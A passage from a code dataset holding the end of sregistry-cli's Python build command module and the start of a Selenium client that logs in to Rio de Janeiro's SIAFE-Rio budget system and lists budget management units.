quiet=args.quiet)\n cli.announce(args.command)\n\n # If the client doesn't have the command, exit\n if not hasattr(cli, \"build\"):\n msg = \"build is not implemented for %s. Why don't you add it?\"\n bot.exit(msg % cli.client_name)\n\n # Singularity Registry Server uses build with a recipe\n if cli.client_name == \"google-build\":\n response = run_google_build(cli, args)\n\n elif cli.client_name == \"google-storage\":\n response = run_compute_build(cli, args)\n\n # Currently allows for google_build\n else:\n bot.warning(\"No URI specified, assuming Singularity Registry with Builder\")\n response = run_registry_build(cli, args, extra)\n\n # If the client wants to preview, the config is returned\n if args.preview:\n print(json.dumps(response, indent=4, sort_keys=True))\n\n\ndef run_google_build(cli, args):\n \"\"\"a helper function to control build for the Google Build Client.\n the user can request a local recipe build, or a build from\n a GitHub repo. In both cases, if no recipe is provided, we default\n to Singularity at the root of the PWD or GitHub repository.\n \"\"\"\n if args.name is None:\n bot.exit(\"Please provide a container identifier with --name\")\n\n # Default to recipe \"Singularity\" unless other is provided\n recipe = \"Singularity\"\n if args.commands:\n recipe = args.commands.pop(0)\n\n # If Github.com is provided in the name, we are doing a GitHub build\n if re.search(\"github.com|gitlab.com\", args.name):\n name = args.name.replace(\"google-build://\", \"\")\n response = cli.build_repo(repo=name, recipe=recipe, preview=args.preview)\n\n else:\n response = cli.build(\n name=args.name, recipe=recipe, context=args.commands, preview=args.preview\n )\n\n # Print output to the console\n if not args.preview:\n print_output(response, args.outfile)\n return response\n\n\ndef run_compute_build(cli, args):\n \"\"\"a compute based build is the oldest versions of build - here we bring\n up our own instance, and then provide control to it. The helper\n functions below (kill, instances, templates) support this version.\n \"\"\"\n # Does the user want to save the image?\n command = args.commands.pop(0)\n\n # Option 1: The user wants to kill an instance\n if command == \"kill\":\n kill(args)\n\n # Option 2: Just list running instances\n elif command == \"instances\":\n instances(args)\n\n # Option 3: The user wants to list templates\n elif \"template\" in command:\n templates(args)\n\n # Option 4: View a specific or latest log\n elif command == \"logs\":\n list_logs(args)\n\n # Option 3: The user is providing a Github repo!\n recipe = \"Singularity\"\n\n if \"github\" in command:\n # One argument indicates a recipe\n if len(args.commands) == 1:\n recipe = args.commands.pop(0)\n\n else:\n # If a command is provided, but not a Github repo\n bot.exit(\"%s is not a recognized option.\" % command)\n\n # Does the user want to specify a name for the collection?\n name = args.name\n\n # No image is needed, we are creating in the cloud\n return cli.build(repo=command, name=name, recipe=recipe, preview=args.preview)\n\n\ndef run_registry_build(cli, args, extra):\n \"\"\"a registry build pushes a recipe file to Singularity Registry Server,\n or given that a GitHub Url is provided, we build from there. For more\n regular building, the user is suggested to directly connect the\n repository to Singularity Registry server. This can serve as a one time\n build.\n \"\"\"\n # The uri can also contain github, which indicates a Github build\n if args.name is None:\n bot.exit(\"Please provide a container identifier with --name\")\n\n recipe = args.commands.pop(0)\n response = cli.build(name=args.name, recipe=recipe, extra=extra)\n\n # Print output to the console\n if response is not None:\n print_output(response, args.outfile)\n return response\n\n\ndef print_output(response, output_file=None):\n \"\"\"print the output to the console for the user. If the user wants the content\n also printed to an output file, do that.\n\n Parameters\n ==========\n response: the response from the builder, with metadata added\n output_file: if defined, write output also to file\n\n \"\"\"\n # If successful built, show container uri\n if \"status\" in response:\n if response[\"status\"] == \"SUCCESS\":\n bucket = response[\"artifacts\"][\"objects\"][\"location\"]\n obj = response[\"artifacts\"][\"objects\"][\"paths\"][0]\n bot.custom(\"MD5HASH\", response[\"file_hash\"], \"CYAN\")\n bot.custom(\"SIZE\", response[\"size\"], \"CYAN\")\n bot.custom(response[\"status\"], bucket + obj, \"CYAN\")\n else:\n bot.custom(response[\"status\"], \"see logs for details\", \"CYAN\")\n\n # Show the logs no matter what\n bot.custom(\"LOGS\", response[\"logUrl\"], \"CYAN\")\n\n # Did the user make the container public?\n if \"public_url\" in response:\n bot.custom(\"URL\", response[\"public_url\"], \"CYAN\")\n\n # Does the user also need writing to an output file?\n if output_file is not None:\n with open(output_file, \"w\") as filey:\n if response[\"status\"] == \"SUCCESS\":\n filey.writelines(\"MD5HASH %s\\n\" % response[\"file_hash\"])\n filey.writelines(\"SIZE %s\\n\" % response[\"size\"])\n filey.writelines(\"%s %s%s\\n\" % (response[\"status\"], bucket, obj))\n filey.writelines(\"LOGS %s\\n\" % response[\"logUrl\"])\n if \"public_url\" in response:\n filey.writelines(\"URL %s\\n\" % response[\"public_url\"])\n\n\ndef kill(args):\n \"\"\"kill is a helper function to call the \"kill\" function of the client,\n meaning we bring down an instance.\n \"\"\"\n from sregistry.main import get_client\n\n cli = get_client(quiet=args.quiet)\n if len(args.commands) > 0:\n for name in args.commands:\n cli.destroy(name)\n sys.exit(0)\n\n\ndef instances(args):\n \"\"\"list running instances for a user, including all builders and report\n instance names and statuses.\n \"\"\"\n from sregistry.main import get_client\n\n cli = get_client(quiet=args.quiet)\n cli.list_builders()\n sys.exit(0)\n\n\ndef templates(args, template_name=None):\n \"\"\"list a specific template (if a name is provided) or all templates\n available.\n\n Parameters\n ==========\n args: the argparse object to look for a template name\n template_name: if not set, show all\n\n \"\"\"\n from sregistry.main import get_client\n\n # We don't need storage/compute connections\n cli = get_client(init=False, quiet=args.quiet)\n\n if len(args.commands) > 0:\n template_name = args.commands.pop(0)\n cli.list_templates(template_name)\n sys.exit(0)\n\n\ndef list_logs(args, container_name=None):\n \"\"\"list a specific log for a builder, or the latest log if none provided\n\n Parameters\n ==========\n args: the argparse object to look for a container name\n container_name: a default container name set to be None (show latest log)\n\n \"\"\"\n from sregistry.main import get_client\n\n cli = get_client(quiet=args.quiet)\n if args.commands:\n container_name = args.commands.pop(0)\n cli.logs(container_name)\n sys.exit(0)\n","repo_name":"singularityhub/sregistry-cli","sub_path":"sregistry/client/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7607,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"35643003725","text":"# pylint: disable=fixme, import-error, too-many-arguments\r\n\r\n# Copyright 2020 Ministério Público do Estado do Rio de Janeiro\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"Interfaces for interacting with SIAFE-Rio in an automated way.\r\n\r\n Rio de Janeiro's Integrated System for Budget Management (SIAFE-Rio) is the\r\n main tool for recording, monitoring and enforcing information regarding to\r\n the State of Rio de Janeiro's public budget, assets and financial\r\n execution.\r\n\r\n This module maps SIAFE-Rio web interface to Python classes and methods.\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nfrom datetime import date, timedelta\r\nfrom functools import cached_property\r\nfrom typing import Mapping, Optional, Sequence, Union\r\n\r\nimport log # type: ignore\r\nfrom dotenv import load_dotenv\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import ( # NoSuchElementException,\r\n NoSuchAttributeException,\r\n StaleElementReferenceException,\r\n)\r\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\r\nfrom selenium.webdriver.support.ui import Select\r\n\r\nfrom bussola_etl_siafe.components.filters import FilterMenu\r\n\r\nload_dotenv(\"../.env\")\r\n\r\nsys.path.append(os.environ[\"CHROME_PATH\"])\r\n\r\n\r\nclass SiafeClient:\r\n \"\"\"Chrome WebDriver signed in SIAFE-Rio Basic Module.\r\n\r\n SIAFE-Rio Basic Module provides the most commonly used information in the\r\n system as standardized tables and reports. This class uses the provided\r\n credentials and a Chrome WebDriver (controlled by Selenium) to establish a\r\n connection and sign in the Basic Module, providing an automated interface\r\n to interact with the system.\r\n\r\n Arguments:\r\n user: User name or number in SIAFE system (usually, the user's Natural\r\n Person Registry number - CPF).\r\n password: User password in SIAFE system.\r\n driver_path: Path to the ChromeDriver executable (available at\r\n https://sites.google.com/a/chromium.org/chromedriver/downloads).\r\n\r\n Keyword Arguments:\r\n fiscal_year: Fiscal year for budget planning and execution. Defaults to\r\n the current year.\r\n timeout: Maximum time to wait for an element while browsing the page\r\n (in seconds). Defaults to 10 seconds.\r\n\r\n Attributes:\r\n build: SIAFE-Rio current build. Not implemented yet.\r\n fiscal_year: Fiscal year for budget planning and execution information\r\n shown in the system.\r\n remaining_time: Remaining time for the current session. Not implemented\r\n yet.\r\n timeout: Maximum time to wait for an element while browsing the page\r\n (in seconds).\r\n user: User name or number currently signed in the SIAFE system.\r\n version: SIAFE-Rio current version. Not implemented yet.\r\n\r\n Raises:\r\n NotImplementedError: When a method or attribute that is not\r\n implemented yet is called.\r\n TimeoutException: If an element cannot be located after the specified\r\n timeout.\r\n \"\"\"\r\n\r\n _greeting_statement_id = 'pt1:pt_aot1'\r\n _ug_select_id = 'pt1:selUg::content'\r\n _login_url: str = 'https://www5.fazenda.rj.gov.br/SiafeRio/faces/login.jsp'\r\n # _thematic_tab_ids: Mapping[str, str] = {\r\n # 'planning': 'pt1:pt_np4:0:pt_cni6::disclosureAnchor',\r\n # 'execution': 'pt1:pt_np4:1:pt_cni6::disclosureAnchor',\r\n # 'projects': 'pt1:pt_np4:2:pt_cni6::disclosureAnchor',\r\n # 'helpers': 'pt1:pt_np4:3:pt_cni6::disclosureAnchor',\r\n # 'administration': 'pt1:pt_np4:4:pt_cni6::disclosureAnchor',\r\n # 'reports': 'pt1:pt_np4:5:pt_cni6::disclosureAnchor',\r\n # }\r\n\r\n def __init__(\r\n self,\r\n user: str,\r\n password: str,\r\n driver_path: Union[str, bytes, os.PathLike],\r\n driver_options: Optional[ChromeOptions] = None,\r\n fiscal_year: int = date.today().year,\r\n timeout: int = 10,\r\n ):\r\n self.user = user\r\n self._password = password\r\n self.fiscal_year = fiscal_year\r\n self.timeout = timeout\r\n\r\n log.debug('Starting Chrome WebDriver session...')\r\n self.driver = webdriver.Chrome(driver_path, options=driver_options)\r\n self.driver.implicitly_wait(self.timeout)\r\n self.driver.set_window_size(3840, 2160)\r\n\r\n log.info('Connecting to SIAFE-Rio Basic Module...')\r\n try:\r\n self._login()\r\n except (StaleElementReferenceException, TimeoutError):\r\n # Could not find greetings, something has gone wrong\r\n self.close()\r\n log.error(\r\n 'An unexpected error occurred. Could not connect to SIAFE-Rio.'\r\n )\r\n raise ConnectionError\r\n else:\r\n log.info('Successfully signed in SIAFE-Rio Basic module.')\r\n\r\n def _login(self):\r\n \"\"\"Interact with login form for SIAFE-Rio .\r\n\r\n Interacts with SIAFE-Rio login form, inputing user credentials,\r\n selecting the fiscal year and submiting the form.\r\n \"\"\"\r\n login_form_ids: Mapping[str, str] = {\r\n 'user_input': 'loginBox:itxUsuario::content',\r\n 'password_input': 'loginBox:itxSenhaAtual::content',\r\n 'fiscal_year_select': 'loginBox:cbxExercicio::content',\r\n 'submit_button': 'loginBox:btnConfirmar',\r\n }\r\n self.driver.get(self._login_url)\r\n # insert user\r\n log.debug('Entering user ID')\r\n user_input = self.driver.find_element_by_id(\r\n login_form_ids['user_input']\r\n )\r\n user_input.send_keys(self.user)\r\n # select fiscal year\r\n log.debug(f'Selecting fiscal year ({self.fiscal_year})')\r\n fiscal_year_select = self.driver.find_element_by_id(\r\n login_form_ids['fiscal_year_select']\r\n )\r\n Select(fiscal_year_select).select_by_visible_text(\r\n str(self.fiscal_year)\r\n )\r\n # try to insert password\r\n for attempt in range(1, 4):\r\n try:\r\n log.debug(f'Entering user password ({attempt}/3)')\r\n password_input = self.driver.find_element_by_id(\r\n login_form_ids['password_input']\r\n )\r\n password_value = password_input.get_attribute('value')\r\n assert len(password_value) == len(self._password)\r\n time.sleep(2)\r\n except (AssertionError, NoSuchAttributeException):\r\n password_input.send_keys(self._password)\r\n # submit\r\n log.debug('Submiting credentials')\r\n submit_button = self.driver.find_element_by_id(\r\n login_form_ids['submit_button']\r\n )\r\n submit_button.click()\r\n time.sleep(2)\r\n\r\n def greet(self) -> str:\r\n \"\"\"Say Hello to user (for checking the connection)\"\"\"\r\n greetings = self.driver.find_element_by_id(\r\n self._greeting_statement_id\r\n ).text\r\n return greetings\r\n\r\n def reset(self):\r\n \"\"\"Force driver to go back to initial page.\"\"\"\r\n raise NotImplementedError\r\n\r\n def close(self) -> None:\r\n \"\"\"Close the current connection.\"\"\"\r\n self.driver.close()\r\n\r\n @property\r\n def available_ugs(self) -> Sequence[Mapping[str, str]]:\r\n \"\"\"Get available Managemet Units (UGs).\"\"\"\r\n log.info('Checking available budget Management Units...')\r\n ug_select = Select(self.driver.find_element_by_id(self._ug_select_id))\r\n ug_options = ug_select.options\r\n # UG visible text has the format '999999 - NAME OF THE UNIT'; split it\r\n ugs_splitted = [\r\n re.split(' +- +', ug_option.text, 1) for ug_option in ug_options\r\n ]\r\n # create a dict with UG name and id for each one\r\n available_ugs = list()\r\n for ug_splitted in ugs_splitted:\r\n if ug_splitted[0] == 'TODAS':\r\n # 'ALL' budget management units option\r\n available_ugs.append({'id': '000000', 'name': 'TODAS'})\r\n else:\r\n available_ugs.append(\r\n {'id': ug_splitted[0], 'name': ug_splitted[1]}\r\n )\r\n # make available units accessible instance-wide\r\n self._available_ugs = available_ugs\r\n return self._available_ugs\r\n\r\n @property\r\n def ug(self) -> Mapping[str, str]:\r\n \"\"\"Get current budget Management Unit (UG).\"\"\"\r\n log.info('Checking current Management Unit...')\r\n # current unit appears in the \"title\" attribute of the